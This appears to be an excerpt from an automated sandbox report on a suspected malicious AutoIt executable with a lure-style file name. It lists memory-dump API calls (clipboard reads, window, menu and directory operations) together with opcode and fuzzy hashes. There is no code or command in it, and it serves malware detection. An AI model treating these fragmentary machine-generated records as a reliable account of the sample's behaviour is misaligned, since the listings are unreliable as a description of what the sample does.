                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                        • String ID: ($,$tooltips_class32
                                                        • API String ID: 225202481-3320066284
                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                        APIs
                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                        • String ID:
                                                        • API String ID: 15083398-0
                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                        • String ID: @$AutoIt v3 GUI
                                                        • API String ID: 867697134-3359773793
                                                        • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                        • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$__wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                        • API String ID: 790654849-32604322
                                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                        • Opcode Fuzzy Hash: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                        APIs
                                                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                        • _fseek.LIBCMT ref: 00452B3B
                                                        • __wsplitpath.LIBCMT ref: 00452B9B
                                                        • _wcscpy.LIBCMT ref: 00452BB0
                                                        • _wcscat.LIBCMT ref: 00452BC5
                                                        • __wsplitpath.LIBCMT ref: 00452BEF
                                                        • _wcscat.LIBCMT ref: 00452C07
                                                        • _wcscat.LIBCMT ref: 00452C1C
                                                        • __fread_nolock.LIBCMT ref: 00452C53
                                                        • __fread_nolock.LIBCMT ref: 00452C64
                                                        • __fread_nolock.LIBCMT ref: 00452C83
                                                        • __fread_nolock.LIBCMT ref: 00452C94
                                                        • __fread_nolock.LIBCMT ref: 00452CB5
                                                        • __fread_nolock.LIBCMT ref: 00452CC6
                                                        • __fread_nolock.LIBCMT ref: 00452CD7
                                                        • __fread_nolock.LIBCMT ref: 00452CE8
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                        • __fread_nolock.LIBCMT ref: 00452D78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                        • String ID:
                                                        • API String ID: 2054058615-0
                                                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window
                                                        • String ID: 0
                                                        • API String ID: 2353593579-4108050209
                                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                        APIs
                                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                        Similarity
                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                        • String ID:
                                                        • API String ID: 1744303182-0
                                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                        • __mtterm.LIBCMT ref: 00417C34
                                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                        • __init_pointers.LIBCMT ref: 00417CE6
                                                        • __calloc_crt.LIBCMT ref: 00417D54
                                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                        Strings
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                        • API String ID: 4163708885-3819984048
                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: __wcsicoll$IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2485277191-404129466
                                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                        APIs
                                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                                        • GetDesktopWindow.USER32 ref: 0045476F
                                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID:
                                                        • API String ID: 3869813825-0
                                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00464B28
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                        • _wcslen.LIBCMT ref: 00464C28
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                        • _wcslen.LIBCMT ref: 00464CBA
                                                        • _wcslen.LIBCMT ref: 00464CD0
                                                        • _wcslen.LIBCMT ref: 00464CEF
                                                        Strings
                                                        Similarity
                                                        • API ID: _wcslen$Directory$CurrentSystem
                                                        • String ID: D
                                                        • API String ID: 1914653954-2746444292
                                                        • Opcode ID: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                        • Opcode Fuzzy Hash: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                        APIs
                                                        • _wcsncpy.LIBCMT ref: 0045CE39
                                                        • __wsplitpath.LIBCMT ref: 0045CE78
                                                        • _wcscat.LIBCMT ref: 0045CE8B
                                                        • _wcscat.LIBCMT ref: 0045CE9E
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                        • _wcscpy.LIBCMT ref: 0045CF61
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                        Strings
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                        • String ID: *.*
                                                        • API String ID: 1153243558-438819550
                                                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: __wcsicoll
                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                        • API String ID: 3832890014-4202584635
                                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                        APIs
                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                        • GetFocus.USER32 ref: 0046A0DD
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                        Strings
                                                        Similarity
                                                        • API ID: MessagePost$CtrlFocus
                                                        • String ID: 0
                                                        • API String ID: 1534620443-4108050209
                                                        • Opcode ID: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                        • Opcode Fuzzy Hash: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB

APIs
• DestroyWindow.USER32(?), ref: 004558E3
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Window$CreateDestroy
• String ID: ,$tooltips_class32
• API String ID: 1109047481-3856767331
• Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
• Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
• Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
• Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98

APIs
• GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
• GetMenuItemCount.USER32(?), ref: 00468C45
• DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
• DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
• DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
• DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
• GetMenuItemCount.USER32 ref: 00468CFD
• SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
• GetCursorPos.USER32(?), ref: 00468D3F
• SetForegroundWindow.USER32(?), ref: 00468D49
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
• PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same seven dumps listed in the records above (0x400000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 1441871840-4108050209
• Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
• Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
• Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
